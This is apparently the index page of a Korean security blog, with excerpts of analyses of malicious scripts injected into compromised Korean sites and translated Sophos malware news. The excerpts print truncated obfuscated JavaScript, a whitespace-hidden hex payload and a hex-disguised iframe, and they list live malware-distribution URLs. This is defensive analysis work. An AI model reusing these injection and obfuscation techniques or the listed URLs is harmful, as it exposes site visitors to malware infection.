본문 바로가기

security

[JS/Obfuscated.HN] http://insaweb9.cafe24.com/bbs/login.php?id=best 악성 스크립트 유포 정리 ! 발견 위치 : hxxp://insaweb9.cafe24.com/bbs/login.php?id=best [악성 스크립트] function c102916999516m4943389011261(m4943389011648) { function m4943389011a31() { var m4943389011e19=16; return m4943389011e19; } return (parseInt(m4943389011648,m4943389011a31())); } function m49433890125ea(m49433890129d2) { var m4943389013589=2; var m4943389012dba=''; m4943389014143=String.fromCharCode; for(m49433890131a2=0;m4.. 더보기
[Sophos] 여러분의 페이스북 프로필을 누가 봤는지 알고 싶으세요? 조심하시길… http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=17800 자신들의 페이스북 프로필을 본 사람이 누구인지 알 수 있는지 나에게 물어보는 페이스북 사용자들이 점점 늘어나고 있습니다. 몇 몇 사용자들은 여러분의 프로필을 감시하는 사람이 누구인지 비밀리에 알 수 있다고 주장하는 웹페이지와 페이스북 어플리케이션에 관심을 가져오고 있습니다.만약 여러분이 누군가가 온라인에서 여러분을 지켜보고 있을지도 모른다고 걱정하는 사람들 중의 한 명이라면, 조심하세요.지금 우리는 엄청나게 많은 페이스북 사용자들이 다음과 같은 메시지를 포스팅하는 것을 보고 있습니다.세상에나 세상에나… 나는 사실 이런 일을 믿을 수가 없습니다! 이제 정말로 여러분은 여러.. 더보기
[Sophos] 야후 보이스(Yahoo Voice) 해킹으로 드러난 최악의 패스워드 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=17700 야후 보이스(Yahoo Voice) 해킹으로 드러난 최악의 패스워드매우 많은 인터넷 사용자들이 패스워드를 선택할 때 어리석은 결정을 하고 있습니다.우리들은 크랙하기 어렵고, 추측하기 어려운 독창적인 패스워드 선택의 중요성에 대해 재삼 재사 얘기를 했었는데, (여러분이 이용하는 웹페이지가 적절하게 데이터베이스를 활용한다면) 그러한 패스워드들은 패스워드 크랙커들의 삶을 매우 어렵게 할 것입니다.그럼에도 불구하고, 사람들은 계속해서 (매우 솔직히) 어리석은 패스워드를 사용하고 그러고 나서, 여러 곳에서 그 동일한 패스워드를 사용함으로써 문제를 악화시킵니다.스칸디나비아의 시큐리.. 더보기
악성코드 유포중에 있는 inews24.com 악성 스크립트 정리 ! 최초 감염 페이지 : http://inews24.cox/js_lib/slide_new.js http://lzxvx.com/pix/rot.html http://lzxvx.com/pix/ll.html ~>최종 파일 : http://oppo.ltevc.com/csx/8191i.css ~> ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css ~> ~> 최종파일 : http://oppo.ltevc.com/csx/8191i.css http://lzxvx.com/pix/swfobject.js http://lzxvx.com/pix/jpg.js var Yszz1="%59"+"%73"+"%7A"+"%7A"+"%30"+"%30";var Yszz2="%78"+"%78"+"%6F"+"%6F"+"%.. 더보기
inews24.com 내에 공백을 이용한 악성 스크립트 살펴보기 ! * 감염 페이지 : http://inews24.com/js_lib/slide_new.js* 위 사이트 접속시 악성코드에 감염 될 수 있음을 알려드립니다! 원본 링크 ! 이처럼 공백이 생겨 있습니다 ! HEX 값 2220200909200909202009202020202020090909202020202009200920202009202009202020090920092020200920202009202020092009090920092020200920202009202020202020090920092020092009092020202009200909202009092009200920092009090920202009200920202009202020092020090920092020202009092020202009090920.. 더보기
오랜만에 풀어본 난독화 스크립트! 감염 사이트 : http://211.239.162.41/~dongposarang/killer.html * 악성 링크이니 조심하시기 바랍니다! Click [복호화] 26.30.400.555.198.351.436.505.220.348.184.595.228.315.464.505.80.117.240.525.204.342.388. 545.202 .96.460.570.198.183.136.520.232.348.448.290.94.141.416.505.198.342.404.570.242.138.456.585.94.297. 444.585.220.348.196.245.92.336.416.560.68.96.440.485.218.303.244.170.168.357.420.580.232.303.456. [생략]. 342.40.. 더보기
[Sophos] Top 5 안드로이드 맬웨어 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=17300 소포스의 새로운 안드로이드용 프리 안티바이러스(사실 안티바이러스 기능보다 더 많은 기능이 있어서, 우리의 마케팅 담당자는 그것을 소포스 모바일 시큐리티(Sophos Mobile Security)라고 칭합니다.) 출시로 사용자들은 안드로이드 맬웨어 환경에서 업데이트할 기회를 얻게 되었습니다.소포스랩은 소포스 모바일 시큐리티의 설치로 생성된 통계들을 조사했었고, 이제는 전세계 118개국의 안드로이드 스마트폰과 태블릿에서 사용되고 있습니다. 그것은 안드로이드 플랫폼에서 가장 자주 만나는 맬웨어에 대해 흥미로운 판독을 하고 있습니다.1. Andr/PJApps-C. 안드로이드용 .. 더보기
[Sophos] 앵그리버드 맬웨어 제작업체, 가짜 안드로이드 앱으로 이윤 챙긴 혐의로 5만 유로 벌금형 원본 링크 : http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=17000 앵그리버드 맬웨어 제작업체, 가짜 안드로이드 앱으로 이윤 챙긴 혐의로 5만 유로 벌금형유명한 안드로이드 앱의 트로이목마 버전을 특별요금 전화번호들에게 비밀리에 대량 SMS를 발송한 한 업체가 5만 유로의 벌금형을 받았습니다.영국 산업 규제기관인 폰페이플러스(PhonepayPlus)는 영국에 있는 1,391개의 핸드폰 번호가 “앵그리 버드(Angry Birds)”나 “어쎄씬 크리드(Assassins Creed)”, “컷 더 로프(Cut the Rope)” 같은 유명한 게임의 트로이목마 버전을 다운로드 한 안드로이드 사용자들을 타깃으로 한 스캠에 의해 사기를 .. 더보기
Hex 코드로 위장하여 악성 Iframe이 삽입된 http://www.jeonju1318.or.kr 감염 사이트 : http://www.jeonju1318.or.kr * 위 사이트는 현재도 감염중에 있습니다! http://www.jeonju1318.or.kr/root/index.php 안에 현재 악성 스크립트가 존재하여서 글을 써 봅니다! 현재 감염된 페이니 내에 ! 이렇게 Hex 코드로 위장하여 Iframe이 삽입되었습니다! src=http://apple.chol.(중략);l width=2 height=2> 더보기
[Sophos] Mac을 타깃으로 공격하는 파이썬(Python)기반의 맬웨어, Windows PC도 공격 http://www.securitytrust.co.kr/bbs/view.asp?tName=tb_sophosnews&RecID=16700 Mac을 타깃으로 공격하는 파이썬(Python)기반의 맬웨어, Windows PC도 공격 소포스랩의 전문가들이 Mac과 Windows 컴퓨터 모두를 타깃으로 하는 새로운 맬웨어 공격을 확인하였는데, 그 맬웨어는 60만 대의 Mac을 공격하기 위해 Flashback 봇넷을 허용했던 그 Java 시큐리티 취약성을 악용한 것입니다. 감염된 웹페이지를 방문한 인터넷 사용자들은 그들 컴퓨터에 악성 소프트웨어를 다운로드 하는Java 익스플로잇을 통해 감염될 위험에 처해 있다는 것을 스스로 알아야 합니다. 최신 맬웨어 공격은 더 많은 악성 코드를 컴퓨터에 다운로드하는 Java 취약성.. 더보기